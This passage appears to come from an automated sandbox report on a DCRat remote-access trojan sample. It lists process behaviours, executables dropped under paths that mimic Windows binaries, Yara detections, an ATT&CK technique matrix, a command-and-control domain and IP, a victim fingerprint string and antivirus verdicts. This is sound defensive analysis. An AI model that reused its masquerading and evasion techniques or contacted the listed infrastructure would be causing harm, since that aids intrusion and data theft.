                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596515Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596390Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596277Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596171Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596062Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595953Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595834Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595718Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595609Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595499Jump to behavior
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: w32tm.exe, 00000027.00000002.1722643285.0000021275E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4101849404.000000001BB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFF:&
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess token adjusted: Debug
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess token adjusted: Debug
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"226533","UserName":"user","IpInfo":{"ip":"8.46.123.33","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;}
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"226533","UserName":"user","IpInfo":{"ip":"8.46.123.33","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}p
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeQueries volume information: C:\Users\user\Desktop\dmhu7oz5yP.exe VolumeInformationJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeQueries volume information: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe VolumeInformationJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeQueries volume information: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe VolumeInformationJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeQueries volume information: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe VolumeInformationJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeQueries volume information: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe VolumeInformation
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeQueries volume information: C:\Users\Public\Libraries\RuntimeBroker.exe VolumeInformation
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeQueries volume information: C:\Users\Public\Libraries\RuntimeBroker.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeQueries volume information: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeQueries volume information: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe VolumeInformation
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: jnTUlYyDyuybgXdgxhTkT.exe PID: 7632, type: MEMORYSTR
                            Source: Yara matchFile source: dmhu7oz5yP.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000015.00000002.1764095997.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1672344237.000000000278B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.1758842332.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.1774197474.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1640757413.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1672344237.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.1764240872.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000019.00000002.1764234703.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.1764240872.000000000310D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000028.00000002.1774346243.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.1763313948.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: dmhu7oz5yP.exe PID: 7296, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7584, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7604, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: jnTUlYyDyuybgXdgxhTkT.exe PID: 7664, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7688, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7720, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 3524, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 5600, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Default\RuntimeBroker.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Media\WinStore.App.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: jnTUlYyDyuybgXdgxhTkT.exe PID: 7632, type: MEMORYSTR
                            Source: Yara matchFile source: dmhu7oz5yP.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000015.00000002.1764095997.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1672344237.000000000278B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.1758842332.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.1774197474.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1640757413.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1672344237.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.1764240872.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000019.00000002.1764234703.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.1764240872.000000000310D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000028.00000002.1774346243.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.1763313948.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: dmhu7oz5yP.exe PID: 7296, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7584, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7604, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: jnTUlYyDyuybgXdgxhTkT.exe PID: 7664, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7688, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7720, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 3524, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 5600, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Default\RuntimeBroker.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Media\WinStore.App.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts11
                            Windows Management Instrumentation                            		1
                            Scheduled Task/Job                            		12
                            Process Injection                            		233
                            Masquerading                            		OS Credential Dumping21
                            Security Software Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job                            		1
                            Scripting                            		1
                            Scheduled Task/Job                            		1
                            Disable or Modify Tools                            		LSASS Memory2
                            Process Discovery                            		Remote Desktop Protocol1
                            Clipboard Data                            		1
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		131
                            Virtualization/Sandbox Evasion                            		Security Account Manager131
                            Virtualization/Sandbox Evasion                            		SMB/Windows Admin SharesData from Network Shared Drive3
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                            Process Injection                            		NTDS1
                            Application Window Discovery                            		Distributed Component Object ModelInput Capture113
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information                            		LSA Secrets2
                            File and Directory Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                            Obfuscated Files or Information                            		Cached Domain Credentials114
                            System Information Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Software Packing                            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502160 Sample: dmhu7oz5yP.exe Startdate: 31/08/2024 Architecture: WINDOWS Score: 100 39 mioww.uebki.one 2->39 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 17 other signatures 2->49 8 dmhu7oz5yP.exe 4 34 2->8         started        12 jnTUlYyDyuybgXdgxhTkT.exe 14 2 2->12         started        15 RuntimeBroker.exe 2->15         started        17 6 other processes 2->17 signatures3 process4 dnsIp5 31 C:\Windows\...\jnTUlYyDyuybgXdgxhTkT.exe, PE32 8->31 dropped 33 C:\Windows\...\jnTUlYyDyuybgXdgxhTkT.exe, PE32 8->33 dropped 35 C:\Windows\Media\WinStore.App.exe, PE32 8->35 dropped 37 14 other malicious files 8->37 dropped 51 Drops PE files to the user root directory 8->51 53 Uses schtasks.exe or at.exe to add and modify task schedules 8->53 55 Creates processes via WMI 8->55 19 cmd.exe 8->19         started        21 schtasks.exe 8->21         started        23 schtasks.exe 8->23         started        25 28 other processes 8->25 41 mioww.uebki.one 188.114.97.3, 49730, 49731, 49732 CLOUDFLARENETUS European Union 12->41 57 Multi AV Scanner detection for dropped file 12->57 59 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 12->59 file6 signatures7 process8 process9 27 conhost.exe 19->27         started        29 w32tm.exe 19->29         started       

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            dmhu7oz5yP.exe79%ReversingLabsByteCode-MSIL.Trojan.Mardom
                            dmhu7oz5yP.exe80%VirustotalBrowse
                            dmhu7oz5yP.exe100%AviraHEUR/AGEN.1310064
                            dmhu7oz5yP.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe100%AviraHEUR/AGEN.1310064
                            C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe100%AviraHEUR/AGEN.1310064
                            C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe100%AviraHEUR/AGEN.1310064
                            C:\Users\Default\RuntimeBroker.exe100%AviraHEUR/AGEN.1310064
                            C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe100%AviraHEUR/AGEN.1310064
                            C:\Users\Default\RuntimeBroker.exe100%AviraHEUR/AGEN.1310064
                            C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe100%AviraHEUR/AGEN.1310064
                            C:\Windows\Media\WinStore.App.exe100%AviraHEUR/AGEN.1310064
                            C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat100%AviraBAT/Delbat.C
                            C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe100%AviraHEUR/AGEN.1310064
                            C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe100%Joe Sandbox ML
                            C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe100%Joe Sandbox ML
                            C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe100%Joe Sandbox ML
                            C:\Users\Default\RuntimeBroker.exe100%Joe Sandbox ML
                            C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe100%Joe Sandbox ML
                            C:\Users\Default\RuntimeBroker.exe100%Joe Sandbox ML
                            C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe100%Joe Sandbox ML
                            C:\Windows\Media\WinStore.App.exe100%Joe Sandbox ML
